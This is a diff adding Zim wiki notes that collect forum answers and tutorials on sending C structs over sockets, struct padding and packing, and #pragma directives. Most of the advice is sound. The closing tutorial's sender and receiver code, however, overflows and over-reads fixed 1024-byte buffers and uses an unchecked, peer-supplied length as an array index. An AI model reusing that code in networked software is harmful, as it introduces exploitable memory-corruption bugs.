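    return (int32_t)ntohl((uint32_t)in->type);            /* network to host order */
}
```

This only addresses byte order; both ends must still agree on the struct layout.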
|
||||
@@ -0,0 +1,69 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-05T15:55:37+08:00
|
||||
|
||||
====== Sending struct over TCP (C-programming) ======
|
||||
Created Sunday 05 June 2011
|
||||
|
||||
Hi again!
|
||||
|
||||
I have a client and server program where I want to send an entire struct from the client and then output the struct member "ID" on the server.
|
||||
|
||||
I have done all the connecting etc and already managed to send a string through:
|
||||
|
||||
send(socket, string, string_size, 0);
|
||||
|
||||
So, is it possible to send a struct instead of a string through send()? Can I just replace my buffer on the server to be an empty struct of the same type and go?
|
||||
|
||||
-----------------
|
||||
Well... sending structs through the network is kinda hard if you are doing it properly.
|
||||
|
||||
Carl is right - you can send a struct through a network by saying:
|
||||
|
||||
send(socket, (char*)&my_struct, sizeof(my_struct), 0);
|
||||
|
||||
But here's the thing:
|
||||
|
||||
sizeof(my_struct) might change between the client and server. Compilers often do some amount of padding and alignment, so unless you define alignment explicitly (maybe using a #pragma pack()), that size may be different.
|
||||
The other problem tends to be byte-order. Some machines are big-endian and others are little-endian, so the arrangement of the bytes might be different. In reality, unless your server or client is running on non-Intel hardware (which is probably not the case) then this problem exists more in theory than in practice.
|
||||
|
||||
So the solution people often propose is to have a routine that **serializes the struct**. That is, it __sends the struct one data member at a time__, ensuring that the client and server only send() and recv() the exact specified number of bytes that you code into your program.
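One way such a serialization routine might look, as a sketch only. The struct record, its fields and the function names are hypothetical; each member is written at a fixed offset in big-endian order, so the result does not depend on the compiler's padding or the host's byte order.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical record, used only for this illustration. */
struct record {
    uint32_t id;
    uint16_t flags;
    char     name[16];
};

#define RECORD_WIRE_SIZE (4 + 2 + 16)

/* Write each member at a fixed offset, most significant byte first. */
static size_t record_encode(unsigned char out[RECORD_WIRE_SIZE], const struct record *r)
{
    assert(out != NULL && r != NULL);
    out[0] = (unsigned char)(r->id >> 24);
    out[1] = (unsigned char)(r->id >> 16);
    out[2] = (unsigned char)(r->id >> 8);
    out[3] = (unsigned char)(r->id);
    out[4] = (unsigned char)(r->flags >> 8);
    out[5] = (unsigned char)(r->flags);
    memcpy(out + 6, r->name, sizeof r->name);
    return RECORD_WIRE_SIZE;
}

/* Rebuild the struct from the same fixed offsets. */
static void record_decode(struct record *r, const unsigned char in[RECORD_WIRE_SIZE])
{
    assert(r != NULL && in != NULL);
    r->id = ((uint32_t)in[0] << 24) | ((uint32_t)in[1] << 16) |
            ((uint32_t)in[2] << 8)  |  (uint32_t)in[3];
    r->flags = (uint16_t)(((unsigned)in[4] << 8) | in[5]);
    memcpy(r->name, in + 6, sizeof r->name);
    r->name[sizeof r->name - 1] = '\0';   /* force termination on untrusted input */
}
```

Because the whole record is assembled in one buffer, it can be handed to a single send() call instead of one call per member.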
|
||||
|
||||
-------------
|
||||
Serialization
|
||||
|
||||
It is often necessary to send or receive complex data structures to or from another program that may run on a different architecture or may have been designed for a different version of the data structures in question. A typical example is a program that saves its state to a file on exit and then reads it back when started.
|
||||
|
||||
The 'send' function will typically start by writing a magic identifier and version to the file or network socket and then proceed to write all the data members one by one (i.e. in serial). If variable length arrays are encountered (e.g. strings), it will either write a length followed by the data or it will write the data followed by a special terminator. The format is often XML or binary in which case the htonl() set of macros may come in handy.
|
||||
|
||||
The 'receive' function will be nearly identical: it will read all the items one by one. Variable-length arrays are either handled by reading the count followed by the data, or by reading the data until the special terminator is reached.
|
||||
|
||||
Since these two functions often follow the same pattern as the declaration of the data(structures), it would be nice if they could all be generated from a common definition.
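The 'send' and 'receive' functions described above could be sketched as follows for a single string payload. The magic value, the version number and all function names are assumptions made up for this example; the layout is magic, version and length as 4-byte big-endian integers, followed by the string bytes.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define MSG_MAGIC   0x5A494D31u  /* arbitrary value chosen for this sketch */
#define MSG_VERSION 1u

static void put_u32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)(v >> 24); p[1] = (unsigned char)(v >> 16);
    p[2] = (unsigned char)(v >> 8);  p[3] = (unsigned char)v;
}

static uint32_t get_u32(const unsigned char *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Returns the number of bytes written, or 0 if the buffer is too small. */
static size_t msg_encode(unsigned char *out, size_t cap, const char *text)
{
    size_t len;
    assert(out != NULL && text != NULL);
    len = strlen(text);
    if (len > UINT32_MAX || cap < 12 || len > cap - 12)
        return 0;
    put_u32(out, MSG_MAGIC);
    put_u32(out + 4, MSG_VERSION);
    put_u32(out + 8, (uint32_t)len);     /* length prefix instead of a terminator */
    memcpy(out + 12, text, len);
    return 12 + len;
}

/* Returns 0 on success, -1 on bad magic or version, truncated input,
 * or a string that does not fit in dst together with its terminator. */
static int msg_decode(const unsigned char *in, size_t n, char *dst, size_t dstcap)
{
    uint32_t len;
    assert(in != NULL && dst != NULL);
    if (n < 12 || get_u32(in) != MSG_MAGIC || get_u32(in + 4) != MSG_VERSION)
        return -1;
    len = get_u32(in + 8);
    if (len > n - 12 || dstcap == 0 || len > dstcap - 1)
        return -1;                       /* never trust the length field blindly */
    memcpy(dst, in + 12, len);
    dst[len] = '\0';
    return 0;
}
```

The decoder mirrors the encoder step by step, which is the pattern the paragraph above says could be generated from a common definition.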
|
||||
----------
|
||||
Not that it matters very much, but you should probably cast the structure to a void*, rather than a char *, since that's what send() is prototyped to take. – Mark Bessey Nov 14 '09 at 17:51
|
||||
|
||||
@rasher: While you mention both packing the struct and serializing, it's important to point out that serializing can murder performance if you're sending a high volume of data. Every call to send causes a fairly expensive context switch between user space and kernel space. __Packing the data is really the preferred method__.
|
||||
------------------
|
||||
Are the client and server machines "the same"? What you are proposing will only work if the C compilers at each end lay out the structure in memory exactly the same. There are lots of reasons why this may not be the case. For example, the client and server machines might have different architectures, and then the way they represent numbers in memory (big-endian, little-endian) might differ. Even if the client machines and server machine have the same architecture, two different C compilers may have different policies for how they lay out structs in memory (e.g. padding between fields to align ints on word boundaries). Even the same compiler with different flags might give different results.
|
||||
|
||||
Pragmatically, I'm guessing that your client and server are the same kind of machine and so what you are proposing will work, however you need to be aware that as a general rule it won't and that's why standards such as CORBA were invented, or why folks use some general representation such as XML
|
||||
---------------
|
||||
You can, if the client and the server have laid out the struct exactly the same way, meaning that the fields are all the same size, with the same padding. For instance if you have a long in your struct, that might be 32bits on one machine and 64bits on the other, in which case the struct will not be received correctly.
|
||||
|
||||
In your case, if the client and the server are always going to be on very similar C implementations (for instance if this is just code you're using to learn some basic concepts, or if for some other reason you know your code will only ever have to run on your current version of OSX), then you can probably get away with it. Just remember that your code will not necessarily work properly on other platforms, and that there's more work to do before it's suitable for use in most real-world situations.
|
||||
|
||||
For most client-server applications, this means that the answer is you can't do it in general. What you actually do is define the message in terms of the number of bytes sent, what order, what they mean, and so on. Then at each end, you do something platform-specific to ensure that the struct you're using has exactly the required layout. Even so, you might have to do some byte-swapping if you're sending integer members of the struct little-endian, and then you want your code to run on a big-endian machine. Data interchange formats like XML, json and Google's protocol buffers exist so that you don't have to do this fiddly stuff.
|
||||
|
||||
[Edit: also remember of course that some struct members can never be sent over the wire. For instance if your struct has a pointer in it, then the address refers to memory on the sending machine, and is useless on the receiving end. Apologies if this is already obvious to you, but it certainly isn't obvious to everyone when they're just beginning with C].
|
||||
|
||||
-------------
|
||||
Technically, the struct will always be received correctly assuming his protocol over the connection works correctly. The problem is not the receiving, it is the interpreting or perhaps you might call it the accessing.
|
||||
------------
|
||||
True. I'd say if you don't actually read all the bytes into application space (because sizeof(thestruct) is smaller on the reader than the writer), then you haven't received the message. Also, I think technically it is sometimes undefined behavior to copy arbitrary bytes over a struct - you could trigger trap bits in the members. So in that case too the message is not received. But you're right, you'll receive (some of) the bytes of the message, just not understand the message itself.
|
||||
------------------
|
||||
In general, it's a bad idea to do this, even if your client and your server turn out to lay out the structure in memory the same way.
|
||||
|
||||
Even if you don't intend to pass more complex data structures (that would involve pointers) back and forth, I recommend that you serialize your data before you send it over the network.
|
||||
----------------------
|
||||
Send the data as text and then decode it after receiving it. This is the best way if you want your data to arrive as it was sent!
|
||||
|
||||
@@ -0,0 +1,44 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-05T16:07:02+08:00
|
||||
|
||||
====== structure padding and structure packing ======
|
||||
Created Sunday 05 June 2011
|
||||
|
||||
struct mystruct_A
|
||||
{
|
||||
char a;
|
||||
int b;
|
||||
char c;
|
||||
}x;
|
||||
|
||||
struct mystruct_B
|
||||
{
|
||||
int b;
|
||||
char a;
|
||||
}y;
|
||||
|
||||
The sizes of these structures are 12 and 8 respectively. Is this structure padding or packing? Can anyone tell me when padding takes place and when packing takes place?
|
||||
|
||||
------------
|
||||
Padding aligns structure members to "natural" address boundaries - say, int members would have offsets, which are mod(4) == 0 on 32-bit platform. Padding is on by default. It inserts the following "gaps" into your first structure:
|
||||
|
||||
struct mystruct_A {
|
||||
char a;
|
||||
char gap_0[3]; /* inserted by compiler: for alignment of b */
|
||||
int b;
|
||||
char c;
|
||||
char gap_1[3]; /* -"-: for alignment of the whole struct in an array */
|
||||
} x;
|
||||
|
||||
Packing, on the other hand prevents compiler from doing padding - this has to be explicitly requested - under GCC it's __attribute__((__packed__)), so the following:
|
||||
|
||||
struct __attribute__((__packed__)) mystruct_A {
|
||||
char a;
|
||||
int b;
|
||||
char c;
|
||||
};
|
||||
|
||||
would produce structure of size 6 on a 32-bit architecture.
|
||||
|
||||
A note though - unaligned memory access is slower on architectures that allow it (like x86 and amd64), and is explicitly prohibited on strict alignment architectures like SPARC.
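To see what a particular compiler actually does, the layout can be printed with sizeof and offsetof. This is a small sketch assuming GCC or Clang; the struct and function names are invented here, and the padded numbers are implementation-defined, so none are promised.

```c
#include <assert.h>
#include <stddef.h>  /* offsetof */
#include <stdio.h>

struct padded_A { char a; int b; char c; };
struct __attribute__((__packed__)) packed_A { char a; int b; char c; };

/* Packed: members follow each other directly, so b always sits at offset 1. */
static_assert(offsetof(struct packed_A, b) == 1, "packed member not adjacent");

/* Print where each member lands in both variants. */
static void show_layout(void)
{
    printf("padded: size=%zu b@%zu c@%zu\n", sizeof(struct padded_A),
           offsetof(struct padded_A, b), offsetof(struct padded_A, c));
    printf("packed: size=%zu b@%zu c@%zu\n", sizeof(struct packed_A),
           offsetof(struct packed_A, b), offsetof(struct packed_A, c));
}
```

Calling show_layout() on both ends of a connection is a quick way to check whether two builds agree on a layout before relying on it.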
|
||||
@@ -0,0 +1,49 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-05T15:14:03+08:00
|
||||
|
||||
====== Sending variable size arrays from client to server ======
|
||||
Created Sunday 05 June 2011
|
||||
I'm in a peculiar situation, maybe somebody could offer some advice.
|
||||
|
||||
I'm using ENet as my main mode of client/server communications at the moment, and have been able to successfully send basic structs back and forth for quite some time.
|
||||
|
||||
I am now in the position, however, in which I need to send variable-sized arrays back and forth between these two machines. I'd like to store this information in a struct, as sending and receiving structs has been pretty easy so far. Sending structs with variable-sized arrays in them appears to be a lot different, though.
|
||||
|
||||
Do I need to use some kind of object serialization or is there a simpler way to do this that I haven't discovered yet?
|
||||
|
||||
The basic idea of the struct I need to send is as follows:
|
||||
|
||||
typedef struct _StructName
|
||||
{
|
||||
int arr_size;
|
||||
int arr[];
|
||||
} StructName;
|
||||
|
||||
|
||||
|
||||
Thanks in advance for any help or suggestions.
|
||||
-----------------
|
||||
Structs are fixed-size, and you want to send a variable sized object, so no, you can't do it that way.
|
||||
|
||||
The typical solution is simply this:
|
||||
|
||||
Sender: send number of elements, then each element in turn.
|
||||
Receiver: read number of elements, then read that many elements in turn.
|
||||
|
||||
I'm assuming you already have a method for determining which object type you're about to receive.
|
||||
----------------------
|
||||
Yes, you need to serialize your array somehow. A prefix length followed by the data is common. (You don't need to go full stateless object network serialization, though, just serializing this particular type would be fine)
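A possible shape for the "length prefix followed by the data" approach, as a sketch only. It uses fixed-width types in place of the original int members, the function names are hypothetical, and it is independent of ENet: the encoded buffer is simply what would be handed to whatever send routine is in use.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>

typedef struct {
    uint32_t arr_size;
    int32_t  arr[];      /* C99 flexible array member */
} StructName;

static void put_u32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)(v >> 24); p[1] = (unsigned char)(v >> 16);
    p[2] = (unsigned char)(v >> 8);  p[3] = (unsigned char)v;
}

static uint32_t get_u32(const unsigned char *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Encode as: element count (4 bytes, big-endian), then each element (4 bytes).
 * Returns the number of bytes written, or 0 if the buffer is too small. */
static size_t array_encode(unsigned char *out, size_t cap, const int32_t *v, uint32_t n)
{
    size_t need = 4 + (size_t)n * 4;
    assert(out != NULL && (v != NULL || n == 0));
    if (cap < need)
        return 0;
    put_u32(out, n);
    for (uint32_t i = 0; i < n; i++)
        put_u32(out + 4 + (size_t)i * 4, (uint32_t)v[i]);
    return need;
}

/* Decode into a freshly allocated StructName; the caller frees it.
 * Returns NULL on truncated input or allocation failure. */
static StructName *array_decode(const unsigned char *in, size_t len)
{
    uint32_t n;
    StructName *s;
    assert(in != NULL);
    if (len < 4)
        return NULL;
    n = get_u32(in);
    if (n > (len - 4) / 4)
        return NULL;                 /* count claims more data than arrived */
    s = malloc(sizeof *s + (size_t)n * sizeof s->arr[0]);
    if (s == NULL)
        return NULL;
    s->arr_size = n;
    for (uint32_t i = 0; i < n; i++)
        s->arr[i] = (int32_t)get_u32(in + 4 + (size_t)i * 4);
    return s;
}
```

The receiver checks the count against the bytes that actually arrived before allocating, so a corrupt or hostile count cannot cause an oversized read.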
|
||||
-------------------------
|
||||
Rather than being terribly specific at this hour, I thought I'd give a handful of random advice --
|
||||
|
||||
Firstly, be aware of struct padding and packing; become familiar with your compiler's "packing" directive. Using Microsoft's compiler, I believe it goes something like #pragma pack(push) #pragma pack(1) <struct definitions> #pragma pack(pop). Eventually you'll have to implement proper serialization for versioning and portability, but until then you can at least avoid sending padding bytes. Also, order your data from the largest datatype down in your structs (and be aware that this is the order the variables are initialized in if you have constructors with parameter lists). Keep in mind that such "unnatural" alignment makes the structs less performant to access, so it's probably worth having a packed version for network transmission, and an unpacked version to perform calculations against.
|
||||
|
||||
When you do get to serialization, you can send data very efficiently -- say, packing a value of 1-50 in 6 bits, or a Boolean value in just 1. Or maybe by compressing the message payload. It takes some work to extract, but in general you're going to expect to get about 10 full network updates over the WWW per second, and the clients have what is effectively forever to decode messages.
|
||||
|
||||
The Decorator pattern is very useful in building up packets or file IO, look into it.
|
||||
|
||||
Message size is somewhat of a trade-off against latency: the longer you spend waiting for enough data to fill a message to the brim, the longer the receiver has to wait for fresh data. It may be worth implementing some kind of timer that will cut off the current message if it's been waiting around too long.
|
||||
|
||||
Most systems use two primary streams, one UDP-based for fast-paced game data, and a second TCP-based for data which is not time-sensitive, such as chat text, score updates, etc.
|
||||
|
||||
155
Zim/Programme/APUE/send_struct_through_socket/pragma.txt
Normal file
@@ -0,0 +1,155 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-05T12:32:12+08:00
|
||||
|
||||
====== pragma ======
|
||||
Created Sunday 05 June 2011
|
||||
#pragma
|
||||
|
||||
|
||||
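Of all the preprocessor directives, #pragma is probably the most complex. It sets compiler state or tells the compiler to perform specific actions. The #pragma directive gives each compiler a way to offer features specific to the host or operating system while remaining fully compatible with the C and C++ languages. By definition, pragmas are specific to a machine or operating system and differ from compiler to compiler.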
|
||||
|
||||
|
||||
|
||||
General format
|
||||
The general form is: #pragma Para, where Para is a parameter. Some commonly used parameters are described below.
|
||||
Common parameters
|
||||
|
||||
|
||||
The message parameter
|
||||
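The message parameter prints a message in the build output window, which is very useful for keeping track of how the source code is configured. It is used as follows: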
|
||||
#pragma message("message text")
|
||||
When the compiler reaches this directive, it prints the message text in the build output window.
|
||||
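When a program defines many macros to control source-code versions, it is easy to forget whether they have all been set correctly; this directive lets us check at compile time. Suppose we want to know whether the macro _X86 has been defined somewhere in the source code. We can do the following: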
|
||||
#ifdef _X86
|
||||
#pragma message("_X86 macro activated!")
|
||||
#endif
|
||||
Once _X86 is defined, the compiler displays "_X86 macro activated!" in the build output window, so we no longer have to scratch our heads over macros we forgot we had defined.
|
||||
code_seg
|
||||
Another frequently used pragma parameter is code_seg. Its format is:
|
||||
#pragma code_seg( ["section-name"[,"section-class"] ] )
|
||||
It sets the code segment in which function code is placed; it is used when developing device drivers.
|
||||
#pragma once
|
||||
(commonly used)
|
||||
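Placing this directive at the very top of a header file ensures that the header is compiled only once. The directive was already available in VC6, but it was not widely used because of compatibility concerns.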
|
||||
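#pragma once is compiler-specific: it works with this toolchain but is not guaranteed to work with others, so it is less portable, although nowadays nearly every compiler supports it.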
|
||||
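#ifndef, #define and #endif are part of the language itself: they are macro definitions that keep a file from being compiled more than once. They therefore work with every compiler that supports the language, and are the better choice for cross-platform code.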
|
||||
#pragma hdrstop
|
||||
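#pragma hdrstop marks the end of the precompiled headers; headers after it are not precompiled. BCB can precompile headers to speed up builds, but precompiling every header may take too much disk space, so this option is used to exclude some of them.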
|
||||
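Sometimes units depend on each other; for example, unit A depends on unit B, so unit B must be compiled before unit A. You can specify the priority with #pragma startup; if #pragma package(smart_init) is used, BCB processes the units in priority order.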
|
||||
#pragma resource
|
||||
#pragma resource "*.dfm" adds the resources in the *.dfm file to the project. The *.dfm file contains the definition of the form's appearance.
|
||||
#pragma warning
|
||||
#pragma warning( disable : 4507 34; once : 4385; error : 164 )
|
||||
is equivalent to:
|
||||
#pragma warning(disable:4507 34) // do not display warnings 4507 and 34
|
||||
#pragma warning(once:4385) // report warning 4385 only once
|
||||
#pragma warning(error:164) // treat warning 164 as an error
|
||||
#pragma warning also supports the following forms:
|
||||
#pragma warning( push [ ,n ] )
|
||||
#pragma warning( pop )
|
||||
Here n is a warning level (1 to 4).
|
||||
#pragma warning( push ) saves the current warning state of all warnings.
|
||||
#pragma warning( push, n ) saves the current warning state of all warnings and sets the global warning level to n.
|
||||
#pragma warning( pop ) pops the most recently pushed warning state off the stack,
|
||||
undoing every change made between the push and the pop. For example:
|
||||
#pragma warning( push )
|
||||
#pragma warning( disable : 4705 )
|
||||
#pragma warning( disable : 4706 )
|
||||
#pragma warning( disable : 4707 )
|
||||
//.......
|
||||
#pragma warning( pop )
|
||||
At the end of this code the saved warning state is restored (including the state of 4705, 4706 and 4707).
|
||||
pragma comment
|
||||
pragma comment(...)
|
||||
This directive places a comment record into an object file or executable file.
|
||||
The commonly used lib keyword links in a library file.
|
||||
Each compiler can use #pragma directives to switch features it supports on or off. For example, for loop optimization:
|
||||
#pragma loop_opt(on) // enable
|
||||
#pragma loop_opt(off) // disable
|
||||
Sometimes a function makes the compiler emit a warning that you know about and want to ignore, such as "Parameter xxx is never used in function xxx". You can do this:
|
||||
#pragma warn -100 // Turn off the warning message for warning #100
|
||||
int insert_record(REC *r)
|
||||
{ /* function body */ }
|
||||
#pragma warn +100 // Turn the warning message for warning #100 back on
|
||||
The function would produce a warning with the unique identifier 100; this suppresses it temporarily.
|
||||
Each compiler implements #pragma differently; a pragma that works in one compiler is almost never valid in another. Check the compiler's documentation.
|
||||
#pragma pack(n) and #pragma pack()
|
||||
struct sample
|
||||
{
|
||||
char a;
|
||||
double b;
|
||||
};
|
||||
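Without #pragma pack(n), sample is aligned to its largest member.
|
||||
(With an alignment value of n, each member is placed on a boundary that is the smaller of n and the member's own size,
|
||||
with padding inserted before the member where needed.) The struct above therefore typically occupies 16 bytes.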
|
||||
With #pragma pack(1), sizeof(sample) is 9 bytes, with no padding bytes.
|
||||
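(Note: when n is larger than the size of the largest member of sample, the size of the largest member is used instead.
|
||||
So a larger n makes the struct faster to access but bigger, and a smaller n does the opposite.)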
|
||||
#pragma pack() cancels #pragma pack(n); structs declared after it are no longer affected by #pragma pack(n).
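The effect can be checked with a small sketch like the one below, assuming a compiler that supports the push/pop form of the pragma (GCC, Clang and MSVC do). The struct names are made up for the example, and the push/pop form is used instead of a bare #pragma pack() so that a setting made by an including file is restored rather than reset.

```c
#include <assert.h>  /* static_assert */
#include <stddef.h>  /* offsetof */

struct sample_default { char a; double b; };   /* default alignment */

#pragma pack(push, 1)   /* save the current setting, then pack to 1 byte */
struct sample_packed { char a; double b; };
#pragma pack(pop)       /* restore whatever was in effect before */

struct sample_after { char a; double b; };     /* default alignment again */

/* Packed: b directly follows a, so the struct has no padding at all. */
static_assert(offsetof(struct sample_packed, b) == 1, "b should follow a");
static_assert(sizeof(struct sample_packed) == 1 + sizeof(double), "no padding expected");

/* After the pop, the layout matches a struct declared before the push. */
static_assert(sizeof(struct sample_after) == sizeof(struct sample_default),
              "pack(pop) did not restore the default");
```

If any of these assumptions does not hold for a given compiler, the build fails at the static_assert instead of producing a silently different layout.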
|
||||
#pragma comment( comment-type ,["commentstring"] )
|
||||
comment-type is a predefined identifier that specifies the type of comment record; it should be one of compiler, exestr, lib or linker.
|
||||
commentstring is a string that supplies additional information for the comment-type.
|
||||
Comment types:
|
||||
1. compiler:
|
||||
Places the name or version of the compiler in the object file; the linker ignores this record.
|
||||
2. exestr:
|
||||
Will be removed in a future version.
|
||||
3. lib:
|
||||
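Places a library-search record in the object file. This type must be accompanied by a commentstring giving the name (and optionally the path) of the library the linker should search. The library name is placed after the default library-search records in the object file, and the linker searches for it as if you had named it on the command line. You can put several library-search records in one source file; they appear in the object file in the same order as in the source file. If the order of the default libraries and an added library matters, compiling with the /Zl switch keeps the default library names out of the object module.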
|
||||
4. linker:
|
||||
Specifies a linker option, so that it does not have to be passed on the command line or set in the development environment.
|
||||
Only the following linker options can be passed to the linker:
|
||||
/DEFAULTLIB ,/EXPORT,/INCLUDE,/MANIFESTDEPENDENCY, /MERGE,/SECTION
|
||||
(1) /DEFAULTLIB:library
|
||||
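The /DEFAULTLIB option adds one library to the list of libraries that LINK searches when resolving references. A library specified with /DEFAULTLIB is searched after libraries specified on the command line and before default libraries named in .obj files. The Ignore All Default Libraries (/NODEFAULTLIB) option overrides /DEFAULTLIB:library. The Ignore Libraries (/NODEFAULTLIB:library) option overrides /DEFAULTLIB:library when the same library name is specified in both.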
|
||||
(2)/EXPORT:entryname[,@ordinal[,NONAME]][,DATA]
|
||||
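With this option you can export a function from your program so that other programs can call it. You can also export data. Exports are usually defined in a DLL. entryname is the name of the function or data item as the calling program will use it. ordinal specifies an index into the export table in the range 1 to 65,535; if you do not specify ordinal, LINK assigns one. The NONAME keyword exports the function only as an ordinal, without an entryname.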
|
||||
The DATA keyword specifies that the exported item is a data item. The data item in the client program must be declared with extern __declspec(dllimport).
|
||||
There are three ways to export a definition, listed in the recommended order of use:
|
||||
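(1) __declspec(dllexport) in the source code; (2) an EXPORTS statement in a .def file; (3) an /EXPORT specification in a LINK command. All three methods can be used in the same program. When LINK builds a program that contains exports, it also creates an import library, unless an .exp file is used in the build.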
|
||||
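LINK uses the decorated form of identifiers. The compiler decorates an identifier when it creates the .obj file. If entryname is given to the linker in its undecorated form (as it appears in the source code), LINK tries to match the name. If it cannot find a unique match, LINK issues an error message. When you need to specify an identifier to the linker, use the Dumpbin tool to get its decorated form.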
|
||||
(3)/INCLUDE:symbol
|
||||
The /INCLUDE option tells the linker to add the specified symbol to the symbol table.
|
||||
To specify multiple symbols, type a comma (,), a semicolon (;) or a space between the symbol names. On the command line, specify /INCLUDE:symbol once for each symbol.
|
||||
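The linker resolves symbol by adding the object that contains the symbol definition to the program. This is useful for including a library object that would otherwise not be linked into the program. Specifying a symbol with this option overrides the removal of that symbol by /OPT:REF.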
|
||||
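The form we use most often is #pragma comment(lib,"*.lib"). For example, #pragma comment(lib,"Ws2_32.lib") links the Ws2_32.lib library. The effect is the same as adding Ws2_32.lib in the project settings, except that people who use your code do not have to change their project settings.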
|
||||
Application example
|
||||
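In network protocol programming we often handle packets of different protocols. One approach is to extract each field through pointer offsets, but this makes the code complicated, and whenever the protocol changes the program is troublesome to modify. Once we understand how the compiler lays out structures, we can use that knowledge to define our own protocol structures and read the fields through the structure members. This not only simplifies the code; if the protocol changes, only the structure definition has to be updated and the rest of the program stays the same. The TCP header is used below to show how to define such a protocol structure.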
|
||||
The protocol structure is defined as follows:
|
||||
#pragma pack(1) // align on 1-byte boundaries
|
||||
struct TCPHEADER
|
||||
{
|
||||
short SrcPort; // 16-bit source port
|
||||
short DstPort; // 16-bit destination port
|
||||
int SerialNo; // 32-bit sequence number
|
||||
int AckNo; // 32-bit acknowledgment number
|
||||
unsigned char HeaderLen : 4; // 4-bit header length
|
||||
unsigned char Reserved1 : 4; // 4 of the 6 reserved bits
|
||||
unsigned char Reserved2 : 2; // the other 2 of the 6 reserved bits
|
||||
unsigned char URG : 1;
|
||||
unsigned char ACK : 1;
|
||||
unsigned char PSH : 1;
|
||||
unsigned char RST : 1;
|
||||
unsigned char SYN : 1;
|
||||
unsigned char FIN : 1;
|
||||
short WindowSize; // 16-bit window size
|
||||
short TcpChkSum; // 16-bit TCP checksum
|
||||
short UrgentPointer; // 16-bit urgent pointer
|
||||
};
|
||||
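#pragma pack() // cancel 1-byte alignment
|
||||
The alignment set by #pragma pack is applied as follows. The first data member of a struct, union or class is placed at offset 0. Each later member is aligned to the smaller of the value given to #pragma pack and the member's own size. In other words, when the #pragma pack value equals or exceeds the size of every data member, it has no effect. The structure as a whole is aligned to the smaller of its largest data member and the #pragma pack value.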
|
||||
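Specifying a library to link: suppose linking requires WSock32.lib. You could of course go to the trouble of adding it to your project, but I find it more convenient to name the library with a #pragma directive: #pragma comment(lib, "WSock32.lib")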
|
||||
|
||||
|
||||
@@ -0,0 +1,71 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-04T17:18:13+08:00
|
||||
|
||||
====== send structure using socket ======
|
||||
Created Saturday 04 June 2011
|
||||
|
||||
------The problem with sending binary data structures over the network is manifold:
|
||||
|
||||
1. You don't know if the structure is compatible with the hardware/software on the other end (word sizes, structure padding/alignment, word endianness, etc).
|
||||
2. Because of #1, you need to encode the structure to some network-neutral format when it's sent and decode it on the receiving end.
|
||||
3. There are many means to accomplish #2, including XML (verbose, but human-readable).
|
||||
|
||||
You can eliminate this cruft if you are 100% certain that the sending and receiving ends are 100% binary compatible and that the applications were built on both ends with the same compiler and linker settings. Good luck in that!
|
||||
|
||||
-------What you should do is serialize the information in the structure into a generic format, send that over the network, and recreate the object on the other side.
|
||||
|
||||
Trying to do the equivalent of a memcpy of the struct over a socket will probably fail horribly.
|
||||
|
||||
I suggest serializing to XML. There's lots of libraries available to work with it.
|
||||
|
||||
------------Linux programming: Linux socket send and receive structure
|
||||
|
||||
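I have recently been developing chat software for Linux. I had not done any C development for a long time and found that much of it had grown rusty. Then I ran into the problem of passing a struct over a socket. After some googling I found that quite a few people had hit the same problem, so I decided to write up my solution and share it.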
|
||||
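The socket send function transmits a buffer of raw bytes, so the sending side first copies the struct into a byte buffer and sends it with send; the receiving side reads the bytes with recv and copies them back into a struct of the original type. That is the main idea; the points to watch in the implementation are described below.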
|
||||
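So that clients can talk to each other privately, I relay messages through the server. Each message a user sends must therefore carry, besides the message body, the sender ID, the receiver ID and so on, which makes a struct the natural choice. The struct I defined is: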
|
||||
|
||||
struct send_info
|
||||
{
|
||||
char info_from[20]; //sender ID
|
||||
char info_to[20]; //receiver ID
|
||||
int info_length; //length of the message body
|
||||
char info_content[1024]; //message body
|
||||
};
|
||||
|
||||
Main code on the sending side (to keep the example short I removed the code that validates the user's input, its length and so on):
|
||||
|
||||
struct send_info info1; //declare the struct variable
|
||||
printf("This is client,please input message:");
|
||||
//read the user's input from the keyboard into info1.info_content
|
||||
memset(info1.info_content,0,sizeof(info1.info_content));//clear the buffer
|
||||
info1.info_length=read(STDIN_FILENO,info1.info_content,1024) - 1;//read the user's input; the -1 drops the trailing newline
|
||||
|
||||
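memset(snd_buf,0,1024);//clear the send buffer; otherwise the receiver may see garbage,
|
||||
//or, if this message is shorter than the previous one, snd_buf will still contain the previous content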
|
||||
|
||||
__memcpy(snd_buf,&info1,sizeof(info1)); //copy the struct into the byte buffer; snd_buf must hold at least sizeof(info1) bytes__
|
||||
send(connect_fd,snd_buf,sizeof(snd_buf),0);//send the message
|
||||
|
||||
Main code on the receiving side:
|
||||
|
||||
struct send_info clt; //declare the struct variable
|
||||
|
||||
memset(recv_buf,'z',1024);//overwrite the receive buffer
|
||||
recv(fd,recv_buf,1024,0 );//read the data
|
||||
|
||||
memset(&clt,0,sizeof(clt));//clear the struct
|
||||
__memcpy(&clt,recv_buf,sizeof(clt));//copy the received bytes back into the struct__
|
||||
|
||||
clt.info_content[clt.info_length]='\0';
|
||||
//terminate the message body; without this line the output may be garbled or otherwise wrong
|
||||
//some people advise against string fields in structs sent this way, probably because of the problem of locating the terminator
|
||||
|
||||
if(clt.info_content[0]) //print the received content if it is not empty
|
||||
printf("\nclt.info_from is %s\nclt.info_to is %s\nclt.info_content is %s\nclt.info_length is %d\n",clt.info_from,clt.info_to,clt.info_content,clt.info_length);
|
||||
//at this point the struct has been sent and received successfully
